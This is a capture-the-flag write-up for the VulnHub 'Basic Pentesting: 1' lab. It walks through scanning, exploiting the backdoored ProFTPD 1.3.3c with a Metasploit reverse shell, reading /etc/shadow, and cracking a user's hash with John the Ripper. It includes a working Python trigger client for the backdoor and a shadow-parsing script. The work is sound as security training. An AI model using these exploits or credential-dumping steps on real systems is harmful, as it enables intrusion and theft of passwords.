- get root access
Hello, and welcome to my first installment of the VulnHub VM Write-ups!
If you've never heard of VulnHub, let me briefly explain what they do. Their purpose is to provide materials that let anyone gain practical, hands-on experience in digital security, computer software and network administration. Like many other CTFs, VulnHub was born to cover as many resources as possible, creating a catalogue of 'stuff' that is (legally) breakable, hackable and exploitable, so you can learn in a safe environment and practise. Before we begin, if you would like to try the Basic Pentesting: 1 VM yourself, or follow along and learn as I go, you can download it from VulnHub.
Alrighty then, I know you’re as eager as me to get your hands dirty with this CTF - so, let’s begin!
As usual, the first thing to do is find the target's IP address by scanning the hosts on the network we're connected to, using a tool such as NetDiscover or Angry IP Scanner. Here I'm using NetDiscover, so let's get started.
sudo netdiscover
The IP address 192.168.0.104 will be our target. Once we have it, let's run an Nmap scan to check for open ports and the services running on them:
nmap -sV -sC -Pn 192.168.0.104
- -sV probe open ports for service and version information
- -sC run the default NSE scripts
- -Pn skip host discovery and treat the host as up (useful when ping is blocked)
The scan reports three open ports on the target:
- port 21/tcp — FTP — (ProFTPD 1.3.3c)
- port 22/tcp — SSH — (OpenSSH 7.2p2 Ubuntu)
- port 80/tcp — HTTP — (Apache httpd 2.4.18)
Port 80 is open, which means the server is hosting an HTTP website. Let's open it in a browser and see what's there.
Damn, nothing useful on the front page, so the next step is to brute-force directory and file names in the web application. For that I'll use gobuster:
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.html,.js
Notes :
- -u to specify a URL
- -w to specify a list of words
- -x file extensions to append to each wordlist entry (so name.php, name.html and name.js are tried as well as name)
Check this out!! The gobuster output shows a directory named /secret with a 301 status. That is a redirect to the same path with a trailing slash, which is how Apache answers for a directory that exists, so it's really there. Let's open http://192.168.0.104/secret/ and take a look!!
On this page I see a login link. However, clicking it gives a 'server not found' error: the link points to the hostname vtcsec instead of the IP, and our machine can't resolve that name. The fix is to map the hostname to the target IP in /etc/hosts on the attacking machine. Open it with "sudo nano /etc/hosts" (editing it needs root) and add a line like 192.168.0.104 vtcsec.
After adding the IP and hostname, then refreshing the page, this is the result I received.
So now we can see the login page. But here we don't know the password. So, what can we do...
Looking back at the Nmap scan, port 21 (FTP) is running ProFTPD 1.3.3c. That version seemed a bit odd, so I looked for more information on it, and look what I found...
ProFTPD 1.3.3c was distributed for a while with a backdoor planted in its source, and Metasploit has an exploit module for it. That means I can get remote command execution on the target. Let's confirm with searchsploit using the command "searchsploit ProFTPd 1.3.3c", which gives the following results.
searchsploit ProFTPd 1.3.3c
Here you can see that it is a Compromised Source Backdoor Remote Code Execution.
So, next, start Metasploit with "msfconsole" in your favourite terminal and follow what I do...
One module matches this exploit: exploit/unix/ftp/proftpd_133c_backdoor (in msfconsole, "search proftpd 1.3.3c" lists it). Select it with "use 0" (or "use exploit/unix/ftp/proftpd_133c_backdoor"), then type "show options" to see what the module needs.
RHOSTS is listed and has to point at the target, so set it with "set RHOSTS 192.168.0.104".
set RHOSTS 192.168.0.104
To get a reverse shell of the targeted machine, we will use the following command "set payload cmd/unix/reverse"
set payload cmd/unix/reverse
Once the payload is set, check the options again with "show options". LHOST now appears: it is the IP of our own (attacking) machine, the one the target will connect back to, so it must be reachable from the target. Here I set it with "set LHOST 192.168.1.101".
Now let's run it and see what happens: type "run" or "exploit" to fire the module and catch the reverse shell.
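To see what the Metasploit module is actually doing on the wire, here is an added example in Python (my own illustration, not code from this write-up or from the Metasploit project). The trigger "HELP ACIDBITCHEZ" is the string the trojaned 1.3.3c source checks for in its HELP handler; the module sends it and then the payload command on the same connection, and the daemon, which runs as root, executes the line. Because no real ProFTPD is available offline, the block also contains a small mock daemon that imitates the backdoored behaviour with canned output: the mock, the loopback address and the canned responses are constructed for the example. Pointing trigger_backdoor() at a real target returns the real output instead.

```python
import socket
import threading

# Trigger that the trojaned ProFTPD 1.3.3c source checks for in its HELP
# handler; the Metasploit module sends it, then the payload command, on the
# same TCP connection.
TRIGGER = b"HELP ACIDBITCHEZ\r\n"

# Canned output for the mock daemon (constructed for this example). A real
# trojaned daemon would run the line through a root shell instead.
MOCK_RESPONSES = {
    "id": "uid=0(root) gid=0(root) groups=0(root)\n",
    "whoami": "root\n",
}


def looks_like_133c(banner):
    """Cheap pre-check on the FTP greeting before sending the trigger."""
    return "ProFTPD 1.3.3c" in banner


def mock_backdoored_ftpd(listen_sock):
    """Serve one client the way the backdoored daemon behaves (simulation only)."""
    conn, _ = listen_sock.accept()
    with conn, conn.makefile("rb") as rf:
        conn.sendall(b"220 ProFTPD 1.3.3c Server (Debian) [::ffff:127.0.0.1]\r\n")
        if rf.readline() != TRIGGER:
            conn.sendall(b"502 Unknown command\r\n")  # what a clean daemon answers
            return
        # After the trigger the real daemon hands the socket to a root shell and
        # sends no FTP reply; the next line is executed verbatim.
        cmd = rf.readline().decode(errors="replace").strip()
        conn.sendall(MOCK_RESPONSES.get(cmd, f"mock: no canned output for {cmd}\n").encode())


def _read_line(sock):
    """Read one newline-terminated line from a raw socket, byte by byte."""
    buf = bytearray()
    while not buf.endswith(b"\n"):
        ch = sock.recv(1)
        if not ch:
            break
        buf += ch
    return bytes(buf)


def trigger_backdoor(host, port, command, timeout=3.0):
    """Client side of the exchange; returns (banner, command output)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = _read_line(s).decode(errors="replace").strip()
        s.sendall(TRIGGER)
        s.sendall(command.encode() + b"\n")
        out = bytearray()
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break  # a real shell stays open; stop once output dries up
            if not chunk:
                break  # the mock closes the connection after one command
            out += chunk
    return banner, out.decode(errors="replace")


def run_demo(command="id"):
    """Run the client and the mock daemon against each other on a loopback port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(1)
    srv.settimeout(5)
    t = threading.Thread(target=mock_backdoored_ftpd, args=(srv,), daemon=True)
    t.start()
    try:
        return trigger_backdoor("127.0.0.1", srv.getsockname()[1], command)
    finally:
        t.join(5)
        srv.close()


if __name__ == "__main__":
    banner, output = run_demo("id")
    print(banner)
    print(output, end="")
```

The point to take away is that there is no authentication at all: one unauthenticated FTP command switches the daemon into a root shell, which is why the version string alone was enough to go straight to exploitation.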
And Boom!!, I've got a remote session, so we can proceed with the attack. Before going further, upgrade the raw shell to an interactive TTY with Python: python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
Now you can see that we are on the target machine as root (root@vtcsec): the backdoored daemon runs as root, so the shell it spawns does too. Next, I'll look at the password hashes in /etc/shadow for further investigation (cat /etc/shadow; the file is only readable as root, which is why this step comes after the backdoor).
Hmm, here we can see that the user marlinspike has a password hash. Without further ado, I'll copy that hash and try to crack it with John the Ripper. We need a text file with the hash in it: open a new terminal, run nano, paste the hash, press Ctrl+X, then Y, and give the file a name when asked.
Example :
nano hashes.txt
copy the encrypted password and paste it into hashes.txt, then..
ctrl and x, then Y
After creating the file, run "john --single hashes.txt" (replace hashes.txt with your file name) and press enter. Single-crack mode builds its guesses from the login name and other account details on the line, so keep the line in user:hash form rather than the bare hash, or it has little to work from; it is a quick first try before reaching for a wordlist.
john --single hashes.txt
Here we can see that one password has been cracked. If john doesn't print it (for example because it was already cracked in an earlier run), use "john --show hashes.txt" to display it.
john --show hashes.txt
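Before copying hashes into a file for john, it helps to know which /etc/shadow entries are worth cracking at all. The following is an added example (my own illustration, not code from this write-up or from John the Ripper) that parses shadow-format lines, classifies each hash by its modular-crypt prefix, separates locked and empty entries from crackable ones, and produces the user:hash lines john expects. SAMPLE_SHADOW is constructed for the example: the $6$ hash is filler of the right shape rather than a real hash, and the guest account with an empty password field is there to show that case. single_mode_style_candidates() only sketches the kind of login-name-derived guesses single mode makes; it is not john's actual rule set.

```python
# Constructed sample of /etc/shadow content for this example (not the lab's
# real hashes; the $6$ value is made-up filler with the right shape).
SAMPLE_SHADOW = """\
root:!:17730:0:99999:7:::
daemon:*:17730:0:99999:7:::
marlinspike:$6$abcdefgh$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ./0123456789abcdefghijkl:17730:0:99999:7:::
guest::17730:0:99999:7:::
"""

# Modular-crypt prefixes commonly met in a shadow file and the scheme they mean.
SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}


def hash_scheme(field):
    """Classify the second field of a shadow line."""
    if field == "":
        return "empty"        # no password at all: login with just the username
    if field[0] in "!*":
        return "locked"       # password login disabled for this account
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"     # legacy 13-character DES crypt(3)
    return "unknown"


def parse_shadow(text):
    """Turn shadow-format text into a list of {user, hash, scheme} dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue          # not a shadow line; skip rather than guess
        entries.append({"user": fields[0], "hash": fields[1],
                        "scheme": hash_scheme(fields[1])})
    return entries


def crackable(entries):
    """Entries that carry a real hash john can attack."""
    return [e for e in entries if e["scheme"] not in ("locked", "empty", "unknown")]


def passwordless(entries):
    """Accounts with an empty password field: a finding on their own, no cracking needed."""
    return [e["user"] for e in entries if e["scheme"] == "empty"]


def john_input(entries):
    """user:hash lines for john. Keeping the user name is what lets --single
    derive its candidates (login name, case variants, appended digits)."""
    return "".join(f"{e['user']}:{e['hash']}\n" for e in crackable(entries))


def single_mode_style_candidates(user):
    """Illustrative subset of login-name-derived guesses (not john's real rules)."""
    base = [user, user.capitalize(), user.upper(), user[::-1]]
    return base + [user + str(n) for n in range(10)] + [user + "123", user + "!"]


if __name__ == "__main__":
    found = parse_shadow(SAMPLE_SHADOW)
    for e in found:
        print(f"{e['user']:<12} {e['scheme']}")
    print("passwordless:", passwordless(found))
    print(john_input(found), end="")
```

Run it on a real dump by replacing SAMPLE_SHADOW with the file contents; the output of john_input() is what to save as hashes.txt for the john commands above.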
I've got the password, and now it's time to check that it's correct. I'll log in over SSH with the username and the password I just cracked. The command is "ssh marlinspike@192.168.0.104".
ssh marlinspike@192.168.0.104
And Booommmm.... the login works, so the cracked password is right. Together with the root shell we already got through the ProFTPD backdoor, that's all the steps to solve the CTF Basic Pentesting: 1.
My aim in writing this is only my own learning. If this article helped you, say thank you to yourself, because you're the one willing to try and keep learning. See you at the next CTF, bye...